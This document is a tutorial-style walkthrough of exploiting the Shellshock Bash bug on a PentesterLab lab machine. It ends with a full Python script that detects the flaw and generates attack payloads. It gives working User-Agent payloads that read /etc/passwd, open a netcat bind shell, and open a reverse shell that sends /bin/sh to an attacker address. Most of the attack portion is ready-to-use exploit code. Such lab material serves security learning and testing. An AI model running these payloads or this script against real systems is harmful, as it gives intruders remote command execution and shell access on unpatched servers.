How to Exploit the ShellShock/Bash Bug CVE-2014-6271 Vulnerability

The "Shellshock" or "Bash Bug" vulnerability was publicly disclosed on September 24, 2014 and was assigned the identifier CVE-2014-6271. According to NIST, "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution" (https://nvd.nist.gov/vuln/detail/CVE-2014-6271).


To exploit this vulnerability, I used a deliberately vulnerable virtual machine running on a Hyper-V instance. The machine itself was downloaded from a lab on PentesterLab (https://pentesterlab.com). I also used a virtualized image of Kali Linux (see image below for version and OS details). Additional tools used were Burp Suite (which comes pre-installed on Kali) and the FoxyProxy add-on for Firefox (https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard).


Once the vulnerable machine was installed on Hyper-V, my first step was to assign it a static IP address using the command sudo ifconfig eth0 192.168.1.5 netmask 255.255.255.0
To confirm the static IP was applied, run ifconfig again and check the inet address shown for eth0. An address set this way does not survive a reboot, so it has to be reapplied (or written into the interface configuration) if the VM is restarted.


I followed this by opening Burp Suite in Kali and binding the proxy listener to loopback only (127.0.0.1) on port 8181. I also turned intercept off, as it was not needed to perform this exploit.
The next thing I did was set up FoxyProxy in the web browser with the localhost address and port 8181. I named this proxy 'Adam's Proxy'. Once it was configured, I enabled all traffic to be routed through the proxy.
Next, I opened the Firefox web browser in my Kali instance and navigated to the vulnerable machine, so that the request to its CGI script showed up in Burp's proxy history.
The attack vector for ShellShock/Bash Bug CVE-2014-6271 here is CGI: Apache exports request headers such as User-Agent to the CGI script as environment variables (HTTP_USER_AGENT), and a vulnerable Bash executes whatever follows a function definition in an environment variable's value when it starts up. Any header the attacker controls is therefore a way in. I sent the captured request to Repeater to start manipulating the headers and see how I could exploit the vulnerability.


To test for ShellShock/Bash Bug CVE-2014-6271, I changed the User-Agent field to the payload () { :;}; echo $(</etc/passwd) which returned the contents of the passwd file. The value has to begin with exactly "() {" (no space between the parentheses), because that is the marker vulnerable Bash looks for when importing a function from the environment; everything after the closing "};" is the trailing string that gets executed.


I decided it would be much more interesting to open a shell to execute commands on the vulnerable machine. To do this, I changed the User-Agent to the following payload: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
This starts a netcat listener on the vulnerable machine that accepts connections on port 9999 and hands each one a /bin/sh (a bind shell).
As you can see, there were no errors returned. Next, I used netcat on my Kali machine to connect to port 9999 on the vulnerable box. From here, I was able to execute commands and root the machine. Note that the shell starts with the privileges of the web server's CGI user (typically www-data), so escalating to root is a separate step once you have the shell.
Next, I wanted to see if I could create a reverse shell. Since most machines in the wild sit behind a firewall that blocks inbound connections on arbitrary ports, a bind shell on port 9999 is unlikely to be reachable; instead, the vulnerable machine should connect back out to my listener on a port that is normally allowed through, such as the ones used by web servers (80, 443).
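The whole procedure above (crafting the User-Agent, checking whether the CGI script actually executed it, and then swapping in the bind-shell or reverse-shell command) can be scripted instead of driven by hand through Burp. The following is an added example written for this page; it is not code from the original post or from PentesterLab. The target address 192.168.1.5 is the lab value from above, while the CGI path /cgi-bin/status and the attacker address 192.168.1.10 are assumptions that must be replaced with the real ones. Unlike the manual test, it uses an arithmetic canary so that a page which merely reflects the User-Agent back cannot be mistaken for a vulnerable one, and it emits a Content-Type header first so mod_cgi returns the command output instead of rejecting it as a malformed header.

```python
#!/usr/bin/env python3
"""Probe a CGI script for Shellshock (CVE-2014-6271) and build shell payloads.

Added example, not code from the original post or from PentesterLab.
Assumptions: host 192.168.1.5 (lab value), CGI path /cgi-bin/status and
attacker address 192.168.1.10 are placeholders to be replaced.
"""
import http.client
import secrets
from typing import Tuple

# Vulnerable Bash only treats an environment variable as an exported function
# when its value starts with exactly "() {" (no space inside the parentheses).
# Whatever follows the closing "};" is the trailing string it then executes.
PREFIX = "() { :;}; "


def shellshock_user_agent(command: str) -> str:
    """Return a User-Agent value that makes a vulnerable CGI script run `command`.

    Apache exports the header to the script as HTTP_USER_AGENT.  Echoing a
    Content-Type header and a blank line first gives mod_cgi a well-formed
    header block, so the command's output lands in the HTTP response body.
    """
    return PREFIX + "echo Content-Type: text/plain; echo; " + command


def bind_shell_user_agent(port: int = 9999) -> str:
    """Same bind shell as in the post: netcat listens on the victim."""
    return PREFIX + f"/usr/bin/nc -l -p {port} -e /bin/sh"


def reverse_shell_user_agent(attacker_ip: str, port: int = 443) -> str:
    """Reverse shell: the victim connects back out on a port firewalls usually allow."""
    return PREFIX + f"/usr/bin/nc {attacker_ip} {port} -e /bin/sh"


def canary_command() -> Tuple[str, str]:
    """Return (command, expected_output) for a harmless test.

    The expected value only appears if Bash evaluated the expression; a page
    that reflects the header carries the expression, not its product.
    """
    a = secrets.randbelow(9000) + 1000
    b = secrets.randbelow(9000) + 1000
    return f"echo $(({a} * {b}))", str(a * b)


def executed(body: str, expected: str) -> bool:
    """True if the canary's computed value came back in the response body."""
    return expected in body


def probe(host: str, path: str = "/cgi-bin/status", port: int = 80,
          timeout: float = 5.0):
    """Send the canary and report (vulnerable, http_status, body)."""
    command, expected = canary_command()
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path,
                     headers={"User-Agent": shellshock_user_agent(command)})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        return executed(body, expected), resp.status, body
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.5"  # lab value
    vulnerable, status, _ = probe(host)
    print(f"{host}: HTTP {status}, "
          f"{'VULNERABLE' if vulnerable else 'canary not executed'}")
    print("bind shell User-Agent:   ", bind_shell_user_agent())
    # 192.168.1.10 is an assumed attacker address; run `nc -l -p 443` there first.
    print("reverse shell User-Agent:", reverse_shell_user_agent("192.168.1.10"))
```

Run it as python3 shellshock_probe.py 192.168.1.5 from the Kali box. For the reverse shell, start the listener on the attacker side before sending the payload; the bind-shell request itself will appear to hang, because the victim's netcat only returns once the shell session ends.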
